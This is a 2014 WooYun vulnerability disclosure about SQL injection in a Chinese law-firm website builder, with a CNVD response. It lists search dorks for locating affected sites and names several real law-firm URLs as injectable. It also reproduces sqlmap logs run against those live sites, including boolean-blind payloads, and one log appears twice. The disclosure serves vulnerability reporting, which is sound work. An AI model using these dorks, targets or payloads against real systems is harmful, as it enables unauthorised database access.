当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074022

漏洞标题:某律师建站系统同一文件多个参数注入

相关厂商:某律师建站系统

漏洞作者: Mosuan

提交时间:2014-08-27 14:03

修复时间:2014-11-25 14:04

公开时间:2014-11-25 14:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-27: 细节已通知厂商并且等待厂商处理中
2014-09-01: 厂商已经确认,细节仅向厂商公开
2014-09-04: 细节向第三方安全合作伙伴开放
2014-10-26: 细节向核心白帽子及相关领域专家公开
2014-11-05: 细节向普通白帽子公开
2014-11-15: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

简要描述:

sql

详细说明:

关键词

技术支持:盛世彩虹 inurl:/index.asp?newsid=
技术支持:盛世彩虹 inurl:/index.asp?


参数很多
比如以下

http://www.jhlawfirm.cn/jhlaw2/intro/index.asp?newsid=1 存在sql注入漏洞http://www.jhlawfirm.cn/jhlaw2/lawyers/index.asp?categoryid=19 存在sql注入漏洞
http://www.jhlawfirm.cn/jhlaw2/case/index.asp?typeid=1 存在sql注入漏洞


下面随机拿几个网站证明是通用的

注入地址:http://www.ccbrr.com/yklaw/yuandi/index.asp?categoryid=73
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 10:50:05
[10:50:05] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.ccbrr.com\session' as session file
[10:50:05] [INFO] testing connection to the target url
[10:50:05] [INFO] testing if the url is stable, wait a few seconds
[10:50:07] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[10:50:08] [INFO] testing if GET parameter 'categoryid' is dynamic
[10:50:08] [INFO] confirming that GET parameter 'categoryid' is dynamic
[10:50:09] [INFO] GET parameter 'categoryid' is dynamic
[10:50:09] [INFO] heuristic test shows that GET parameter 'categoryid' might be
injectable (possible DBMS: Microsoft Access)
[10:50:09] [INFO] testing sql injection on GET parameter 'categoryid'
[10:50:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:50:11] [INFO] GET parameter 'categoryid' is 'AND boolean-based blind - WHERE
or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access.
Do you want to skip test payloads specific for other DBMSes? [Y/n]
[10:50:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:50:53] [INFO] checking if the injection point on GET parameter 'categoryid'
is a false positive
GET parameter 'categoryid' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
sqlmap identified the following injection points with a total of 20 HTTP(s) requ
ests:
---
Place: GET
Parameter: categoryid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: categoryid=73 AND 1113=1113
---
[10:51:09] [INFO] testing Microsoft Access
[10:51:09] [INFO] confirming Microsoft Access
[10:51:10] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:51:10] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[10:51:10] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 14 times
[10:51:10] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.ccbrr.com'
[*] shutting down at 10:51:10


注入地址:http://www.xinjielawfirm.com/xjlaw/cases/index.asp?categoryid=77
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 10:50:29
[10:50:29] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.xinjielawfirm.com\session' as session file
[10:50:30] [INFO] testing connection to the target url
[10:50:30] [INFO] testing if the url is stable, wait a few seconds
[10:50:32] [INFO] url is stable
[10:50:32] [INFO] testing if GET parameter 'categoryid' is dynamic
[10:50:32] [INFO] confirming that GET parameter 'categoryid' is dynamic
[10:50:36] [INFO] GET parameter 'categoryid' is dynamic
[10:50:37] [INFO] heuristic test shows that GET parameter 'categoryid' might be
injectable (possible DBMS: Microsoft Access)
[10:50:37] [INFO] testing sql injection on GET parameter 'categoryid'
[10:50:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:50:40] [INFO] GET parameter 'categoryid' is 'AND boolean-based blind - WHERE
or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access.
Do you want to skip test payloads specific for other DBMSes? [Y/n]
[10:50:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:50:56] [INFO] checking if the injection point on GET parameter 'categoryid'
is a false positive
GET parameter 'categoryid' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
sqlmap identified the following injection points with a total of 20 HTTP(s) requ
ests:
---
Place: GET
Parameter: categoryid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: categoryid=77 AND 1333=1333
---
[10:51:11] [INFO] testing Microsoft Access
[10:51:11] [INFO] confirming Microsoft Access
[10:51:12] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:51:12] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[10:51:12] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 14 times
[10:51:12] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.xinjielawfirm.com'
[*] shutting down at 10:51:12


注入地址:http://www.xinjielawfirm.com/xjlaw/cases/index.asp?categoryid=77
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 10:50:29
[10:50:29] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.xinjielawfirm.com\session' as session file
[10:50:30] [INFO] testing connection to the target url
[10:50:30] [INFO] testing if the url is stable, wait a few seconds
[10:50:32] [INFO] url is stable
[10:50:32] [INFO] testing if GET parameter 'categoryid' is dynamic
[10:50:32] [INFO] confirming that GET parameter 'categoryid' is dynamic
[10:50:36] [INFO] GET parameter 'categoryid' is dynamic
[10:50:37] [INFO] heuristic test shows that GET parameter 'categoryid' might be
injectable (possible DBMS: Microsoft Access)
[10:50:37] [INFO] testing sql injection on GET parameter 'categoryid'
[10:50:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:50:40] [INFO] GET parameter 'categoryid' is 'AND boolean-based blind - WHERE
or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access.
Do you want to skip test payloads specific for other DBMSes? [Y/n]
[10:50:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:50:56] [INFO] checking if the injection point on GET parameter 'categoryid'
is a false positive
GET parameter 'categoryid' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
sqlmap identified the following injection points with a total of 20 HTTP(s) requ
ests:
---
Place: GET
Parameter: categoryid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: categoryid=77 AND 1333=1333
---
[10:51:11] [INFO] testing Microsoft Access
[10:51:11] [INFO] confirming Microsoft Access
[10:51:12] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:51:12] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[10:51:12] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 14 times
[10:51:12] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.xinjielawfirm.com'
[*] shutting down at 10:51:12


注入地址:http://www.xinghelawfirm.com/xhlaw/service/index.asp?newsid=301
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 10:59:51
[10:59:51] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.xinghelawfirm.com\session' as session file
[10:59:52] [INFO] testing connection to the target url
[10:59:52] [INFO] testing if the url is stable, wait a few seconds
[10:59:53] [INFO] url is stable
[10:59:53] [INFO] testing if GET parameter 'newsid' is dynamic
[10:59:54] [INFO] confirming that GET parameter 'newsid' is dynamic
[10:59:54] [INFO] GET parameter 'newsid' is dynamic
[10:59:55] [INFO] heuristic test shows that GET parameter 'newsid' might be inje
ctable (possible DBMS: Microsoft Access)
[10:59:55] [INFO] testing sql injection on GET parameter 'newsid'
[10:59:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:59:57] [INFO] GET parameter 'newsid' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access.
Do you want to skip test payloads specific for other DBMSes? [Y/n]
[11:00:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:00:22] [INFO] checking if the injection point on GET parameter 'newsid' is a
false positive
GET parameter 'newsid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N]
sqlmap identified the following injection points with a total of 20 HTTP(s) requ
ests:
---
Place: GET
Parameter: newsid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsid=301 AND 4937=4937
---
[11:00:33] [INFO] testing Microsoft Access
[11:00:34] [INFO] confirming Microsoft Access
[11:00:34] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[11:00:34] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[11:00:34] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 14 times
[11:00:34] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.xinghelawfirm.com'
[*] shutting down at 11:00:34


注入地址:http://www.brightlawyer.cn/brlaw/intro/index.asp?newsid=7
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 11:00:39
[11:00:39] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.brightlawyer.cn\session' as session file
[11:00:39] [INFO] testing connection to the target url
[11:00:40] [INFO] testing if the url is stable, wait a few seconds
[11:00:41] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[11:00:42] [INFO] testing if GET parameter 'newsid' is dynamic
[11:00:43] [INFO] confirming that GET parameter 'newsid' is dynamic
[11:00:43] [INFO] GET parameter 'newsid' is dynamic
[11:00:43] [INFO] heuristic test shows that GET parameter 'newsid' might be inje
ctable (possible DBMS: Microsoft Access)
[11:00:43] [INFO] testing sql injection on GET parameter 'newsid'
[11:00:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:00:44] [INFO] GET parameter 'newsid' is 'AND boolean-based blind - WHERE or
HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access.
Do you want to skip test payloads specific for other DBMSes? [Y/n]
[11:00:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:00:53] [INFO] checking if the injection point on GET parameter 'newsid' is a
false positive
GET parameter 'newsid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N]
sqlmap identified the following injection points with a total of 20 HTTP(s) requ
ests:
---
Place: GET
Parameter: newsid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsid=7 AND 4437=4437
---
[11:02:32] [INFO] testing Microsoft Access
[11:02:32] [INFO] confirming Microsoft Access
[11:02:33] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[11:02:33] [WARNING] on Microsoft Access it is not possible to enumerate databas
es
[11:02:33] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 14 times
[11:02:33] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.brightlawyer.cn'
[*] shutting down at 11:02:33


漏洞证明:

public

修复方案:

过滤

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-09-01 09:24

厂商回复:

CNVD确认并复现所述情况,暂未能建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无